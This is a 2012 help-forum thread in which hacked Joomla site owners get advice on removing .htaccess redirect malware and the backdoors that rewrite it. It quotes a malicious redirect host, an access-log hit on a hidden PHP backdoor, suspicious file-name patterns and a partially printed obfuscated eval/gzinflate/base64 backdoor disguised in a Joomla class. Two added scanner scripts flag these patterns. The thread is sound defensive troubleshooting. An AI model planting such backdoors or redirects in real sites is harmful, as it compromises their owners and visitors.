
malware problem in my web site. it is redirect and give warning message.

malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 4:13 AM
I have read the FAQs and checked for similar issues: YES / NO
My site's URL (web address) is: www.bizsecures.com
Description (including timeline of any changes made):
I verified the web site and logged in to Webmaster Tools after the malware problem. Now I have cleaned my web site.
Now I can't give a malware review in Webmaster Tools; it does not appear there. Now Webmaster Tools > Malware says that Google has not detected any malware on this site.
The web site still redirects and shows a warning message.
Please help me. Thanks
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 4:48 AM
Unfortunately your site is still hacked. When pages on your site are requested, the request redirects to a malicious site, http:// locationlook . ru /vis/index.php, which is why you get the warnings. The most likely cause for this type of redirect is a hack of the .htaccess file. If you have cleaned up the .htaccess file, check it again to see if the malicious redirect is back. If you have cleaned it up and it is back, it means there is a backdoor on your site which is re-writing the hack code.
Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 5:10 AM
How do I remove the backdoor from my web site? Please help me.

Thanks.
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 5:23 AM
First just to be sure I am being clear on what indicates a backdoor --  If you have previously checked the .htaccess file and found it was hacked with a malicious redirect and either removed the malicious redirect from the file  or deleted the .htaccess file and then gone back later and found that the malicious code has been added back to the .htaccess file or that the .htaccess file has been added back to your site then it is likely you have a backdoor, a file or some script the hackers have hidden on your site that is re-writing the file.

If that is what is happening on your site then I suggest you read through this blog post, http://redleg-redleg.blogspot.com/2012/01/malicious-htaccess-redirect-re-written.html, which provides some tips on finding a backdoor on your site. Looking for a backdoor can be pretty tedious so you want to be sure that is what is happening before you go down that path!


Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 6:17 AM
I found .htaccess redirection code outside of public_html, in the home directory.

I removed the .htaccess file.

When I scanned the web site at http://sitecheck.sucuri.net/scanner/

it mentioned malware found at the URL http://www.bizsecures.com/404javascript.js

but actually it is not there.

Now the web site is OK. http://www.bizsecures.com/

Now the maintenance page is displayed.

Now I should not worry about a backdoor. Is that so?

Should I follow any further security methods?

Thanks.
Re: malware problem in my web site. it is redirect and give warning message. redleg 1/24/12 6:33 AM
No, the site is not redirecting now so looks like you are OK.  I do suggest that you monitor the content of any/all .htaccess files and make sure they stay clean and follow up with some basic security stuff --

Most hacked sites I see are due to compromised passwords.  Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords; use a couple of different security packages. Change ALL passwords, especially FTP. Never store/save your passwords in your FTP client; use secure FTP if available. Install a good anti-virus program and do regular scans of your computer.  Your hosting service may be able to help you pin it down; if you notify them when you see any changes they could check the access logs and maybe determine the account being used when the files are modified.

The second most common thing I see is problems with file/folder permissions.  The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc.  You'll see different views on what permissions should be; I go with files set to 644 and folders set to 755.  It is a good idea to regularly check file/folder permissions.

Good Luck!
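Added example (not part of the original posts): one way to run the two recurring checks suggested above, flagging anything looser than files 644 / folders 755 and fingerprinting every .htaccess so a re-written file shows up against a known-clean baseline. The function names are hypothetical; run it from the account's home directory, since the malicious .htaccess in this thread sat outside public_html.

```python
import hashlib
import os
import stat


def audit_tree(root, file_mode=0o644, dir_mode=0o755):
    """Walk root and return (loose, digests).

    loose   -- (path, mode) for entries with permission bits beyond
               644 for files / 755 for folders, the values from the post
    digests -- SHA-256 of every .htaccess found, keyed by path
    """
    loose, digests = [], {}
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful
            mode = stat.S_IMODE(st.st_mode)
            allowed = dir_mode if stat.S_ISDIR(st.st_mode) else file_mode
            if mode & ~allowed:
                loose.append((path, oct(mode)))
            if name == ".htaccess" and stat.S_ISREG(st.st_mode):
                with open(path, "rb") as fh:
                    digests[path] = hashlib.sha256(fh.read()).hexdigest()
    return loose, digests


def htaccess_changes(baseline, current):
    """Compare two digest maps from audit_tree; report what appeared,
    vanished or changed since the known-clean baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }
```

Store the digest map from a clean state somewhere off the web server and compare on a schedule; any "added" or "modified" entry you did not make yourself is the signal to go looking for a backdoor.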
Re: malware problem in my web site. it is redirect and give warning message. danbiz 1/24/12 6:37 AM
Thank you so much.

I'll follow it.
Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/11/12 10:20 AM
I have exactly the same problem described in this reply, and malware found in /404javascript.js, which does not exist in public_html. Can you help me find that....
Re: malware problem in my web site. it is redirect and give warning message. Redleg x3 9/11/12 10:27 AM
@sushant garg   That means your error handling is hacked.  When a file that does not exist is requested, your site (should) respond with an HTTP status code of 404 File not Found.  Your site is responding with malware; either a redirect or maybe the 404 page is hacked.
Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/13/12 12:03 PM
I am trying a number of things:
1. Made a blank 404javascript.js and uploaded it; this also doesn't work.
2. Renamed .htaccess, but a new .htaccess is created automatically everywhere.
3. I checked the 404.shtml file; there is nothing.

What should I do to remove this? Please, please help me .....
Re: malware problem in my web site. it is redirect and give warning message. Redleg x3 9/13/12 12:23 PM
@sushant garg

This is a very widespread hack on Joomla sites currently.  In all cases I have seen so far this has been a .htaccess hack. In all cases the hack has included a backdoor. On the sites I have seen the backdoors have been in folders like /images/stories/ or images/banners. Check through your access logs for hits like this:

[04/Sep/2012:15:20:17 -0600] "POST /images/banners/.lib_l9ium8.php HTTP/1.1" 500 3950 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Each time the file is called it makes a request to a site controlled by the hackers and the malicious code that is written to the .htaccess file is returned. The code that is returned changes regularly, sometimes it is a redirect to a malicious site (which then redirects back to google or bing), sometimes it is to a .ru site that is not currently malicious and sometimes it is a redirect directly to google.

The file names have also followed patterns like .cache_bqwn68.php .cache_boacfm.php .cache_ja3loa.php  story.php and a host of others.  Check for file names with that pattern and if you find any suspicious file check for some obfuscated php code that starts out like this preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65 .

You need to find those files, the backdoors and remove them.
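Added example (not part of the original posts): the two checks described above, written as a script that flags POST requests to .php files under an images/ folder in an access log and finds PHP files carrying the quoted preg_replace("/.*/e", "\x65\x76...") opener, decoding the hex escapes so the match can be reviewed. The log lines are constructed samples, the function names are hypothetical, and treating any POSTed .php under images/ as suspicious is an assumption drawn from the folders named in the post.

```python
import os
import re

# Constructed access-log lines in the shape of the hit quoted in the post
# (client addresses are documentation-range placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2012:15:20:17 -0600] "POST /images/banners/.lib_l9ium8.php HTTP/1.1" 500 3950 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Sep/2012:15:21:02 -0600] "GET /images/banners/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Sep/2012:15:22:40 -0600] "POST /index.php?option=com_contact HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

# Heuristic (assumption): no legitimate PHP should be POSTed to under images/.
PHP_UNDER_IMAGES = re.compile(r'"POST (/(?:\S*/)?images/\S*?\.php)[?\s]')

# The obfuscated opener quoted in the post: preg_replace with the /e
# modifier and a hex-escaped replacement string.
SIGNATURE = re.compile(rb'preg_replace\s*\(\s*"/\.\*/e"\s*,\s*"((?:\\x[0-9a-fA-F]{2})+)')


def suspicious_posts(lines):
    """Return request paths of POSTs to .php files under an images/ directory."""
    return [m.group(1) for m in map(PHP_UNDER_IMAGES.search, lines) if m]


def decode_hex_escapes(escaped):
    """Turn b'\\x65\\x76...' into readable text so the payload opener can be reviewed."""
    return bytes.fromhex(escaped.replace(b"\\x", b"").decode("ascii")).decode("latin-1")


def scan_webroot(root):
    """Map each .php file carrying the signature to its decoded opener.
    os.walk is used so dot-prefixed names such as .cache_*.php are included."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    match = SIGNATURE.search(fh.read())
                if match:
                    hits[path] = decode_hex_escapes(match.group(1))
    return hits


if __name__ == "__main__":
    print(suspicious_posts(SAMPLE_LOG))
    print(scan_webroot("."))  # run from the account's home directory
```

The signature only covers the opener quoted in this thread; a file name from the log with no signature match still deserves a manual look.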

Re: malware problem in my web site. it is redirect and give warning message. sushant garg 9/14/12 5:02 AM
Thanks for the suggestion. I found a file named /public_html/mytechbox.co.in/images/banners/.cache_jyorye.php, with this code:
/**
* Utility class for the submenu
*
* @package Joomla
*/
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79UuSJs5NF1hg64Wlu4uxm+Pvfs+MXlbaF8Bpz3Xdz+9xGxuk0Wj0NhrNjEalXuAHIWsx64f+4LG1s1bquwNn5sedWeR2nD+cG8iLw5mr5fRGThi5MWTYH71JP5hHG43m44YNIM4sHnWmThQhxn6v13yyVR+4ztP+z41Bt7f11HXrTq/36Gm93nCe6LU5vdgLJojy0PPd6J0zAXRre97E60BVZdsNwyDs+MHQrh5fvH1b2dHyILVD+ZFdrRs5Y+em4964vRki78Te2BUQkEtfO7439uKyShs7Q6/X+XMWxG7UCWcThOG5QKg3ccv2x7OTzoeD07Ojk2O7yuxm7bEN2WveoDxMlx9Oe+VKhX1bezCYTXj7oHQUh9408p1o5EblkhOGzi3BPAjdeBZOmBd1KFHlPWP0AXBPqXodAZAgwbZZHuadtQd3aw9K................................................................9\x20\x29\x20\x3b",".");?>
class JSubMenuHelper
{
function addEntry($name, $link = '', $active = false)
{
$menu = &JToolBar::getInstance('submenu');
$menu->appendButton($name, $link, $active);
}
}
Can you tell me what I have to delete there: the file or the code? If the code, how much ......
I found one more file, .lib_kclcpp.php, in another website's folder, with almost the same code.
Thanks in advance.